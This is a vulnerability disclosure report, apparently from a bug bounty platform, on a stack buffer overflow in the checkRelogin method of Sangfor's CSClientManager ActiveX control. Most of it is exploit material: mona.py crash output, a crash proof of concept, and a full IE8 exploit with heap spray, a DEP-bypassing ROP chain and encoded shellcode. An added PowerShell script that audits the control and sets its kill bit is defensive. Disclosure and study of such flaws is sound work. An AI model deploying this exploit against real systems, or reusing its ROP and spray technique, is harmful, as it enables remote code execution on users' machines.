Vulnerability summary
Followers: 24
Title: #4 Sangfor CSClientManager ActiveX Remote Code Execution, DEP bypass on IE8
Submitted: 2013-11-16 17:00
Fixed: 2014-02-14 17:01
Published: 2014-02-14 17:01
Type: Remote code execution
Severity: High
Self-assessed Rank: 15
Status: Confirmed by vendor
Tags: none
Vulnerability details, disclosure status:
2013-11-16: Details reported to the vendor, awaiting vendor handling
2013-11-18: Vendor confirmed; details disclosed to the vendor only
2013-11-21: Details opened to third-party security partners
2014-01-12: Details opened to core white hats and relevant domain experts
2014-01-22: Details opened to regular white hats
2014-02-01: Details opened to intern white hats
2014-02-14: Details disclosed to the public
Brief description (mona.py output from the crash):
[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
Details: The vulnerable control is distributed through Sangfor's official login channel, so please upgrade it. Judging by the version it appears to be the new 6.0 release; the earlier vulnerability was in the 4.x versions.
Name: CSClientManager Class
Publisher: Sangfor Technologies Co.,Ltd
Type: ActiveX control
Version: 6.0.0.0
File date:
Last accessed: 2013-11-16, 14:51
Class ID: {D257CF85-8E97-4C9B-8407-459B28006000}
Use count: 118
Blocked count: 0
File: CSClientManagerPrj.dll
Folder: C:\Program Files\Sangfor\SSL\ClientComponent3
Proof of concept (crash trigger: the argument to checkRelogin is copied into a fixed-size stack buffer, overwriting EIP at offset 190 and the SEH record at offset 214):
<html>
<object classid='clsid:D257CF85-8E97-4C9B-8407-459B28006000' id='target' ></object>
<script>
junk1 = "";
while(junk1.length < 190) junk1+="A";
eip = "BBBB";
junk2 = "CCCCCCCCCCCCCCCCCCCC";
nseh = "DDDD";
seh ="EEEE";
junk3 = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF";
payload = junk1 + eip + junk2 + nseh + seh + junk3;
target.checkRelogin(payload);
</script>
</html>
Tested on Windows XP SP3 with IE8: ROP chain to bypass DEP.
<html>
<head>
<title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title>
</head>
<body>
<!--
[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes)
Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes)
Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes)
Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes)
Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322)
-->
<object classid="clsid:D257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
<script>
// [ Shellcode ]
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var rop_chain =
//"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
//"\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll]
//"\u5ED5\u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
//"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
//"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
//"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
//"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// The real rop chain
"\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
"\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
"\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
"\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
"\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
"\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
"\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
"\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
"\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
"\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
"\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
"\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
"\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
"\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
"\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]
// [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000){ fill += fill; }
// [ padding offset ]
padding = fill.substring(0, 0x5F6);
// [ fill each chunk with 0x1000 bytes ]
evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
// [ repeat the block to 512KB ]
while (evilcode.length < 0x40000){ evilcode += evilcode; }
// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
var block = evilcode.substring(2, 0x40000 - 0x21);
// [ Allocate 200 MB ]
var slide = new Array();
for (var i = 0; i < 400; i++){ slide[i] = block.substring(0, block.length); }
var junk = '';
while(junk.length<190) junk += 'A';
popeax = "\x28\x7b\x71\x7d"; // 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll)
xchg = "\x79\x68\x44\x3e"; // 0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll)
str = "\x0c\x0c\x0c\x0c";
payload = junk + popeax + str +str +xchg;
poc.checkRelogin(payload);
</script>
</body>
</html>
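The report's only remediation advice is to upgrade the control. As an added example that is not part of the original report, this PowerShell snippet audits whether the CSClientManager control is registered on a machine and sets the Internet Explorer kill bit for the CLSID given above, so IE refuses to instantiate the control even while the vulnerable DLL remains on disk. It assumes an elevated session; the registry locations are Microsoft's documented ActiveX Compatibility mechanism and the CLSID is the one from the report.

```powershell
# Added example, not from the original report: audit and kill-bit the
# vulnerable Sangfor CSClientManager ActiveX control. Run elevated.
$clsid = '{D257CF85-8E97-4C9B-8407-459B28006000}'   # CLSID from the report

# 1. Is the control registered, and which DLL backs it?
$inproc = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
if (Test-Path $inproc) {
    $dll = (Get-ItemProperty -Path $inproc).'(default)'
    Write-Output "Control registered, server DLL: $dll"
    if ($dll -and (Test-Path $dll)) {
        $ver = (Get-Item $dll).VersionInfo.FileVersion
        Write-Output "File version: $ver   (report affects 6.0.0.0 and earlier 4.x builds)"
    }
} else {
    Write-Output "Control not registered on this host ($clsid)"
}

# 2. Set the kill bit: 'Compatibility Flags' = 0x400 under ActiveX Compatibility.
#    On 64-bit Windows the 32-bit IE reads the Wow6432Node copy as well, so set both.
$bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)
foreach ($base in $bases) {
    if (-not (Test-Path (Split-Path $base))) { continue }   # no Wow6432Node on 32-bit
    $killKey = Join-Path $base $clsid
    if (-not (Test-Path $killKey)) { New-Item -Path $killKey -Force | Out-Null }
    New-ItemProperty -Path $killKey -Name 'Compatibility Flags' `
        -PropertyType DWord -Value 0x400 -Force | Out-Null

    # 3. Verify the bit actually landed.
    $flags = (Get-ItemProperty -Path $killKey).'Compatibility Flags'
    if ($flags -band 0x400) {
        Write-Output "Kill bit set: $killKey"
    } else {
        Write-Output "Kill bit NOT set: $killKey"
    }
}
```

The kill bit only blocks instantiation through Internet Explorer and other MSHTML hosts; it does not patch the overflow in checkRelogin, so the control should still be upgraded or removed.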
Remediation:
Vulnerability response
Vendor response:
Severity: Medium
Rank: 8
Confirmed: 2013-11-18 16:53
Vendor reply:
Latest status: none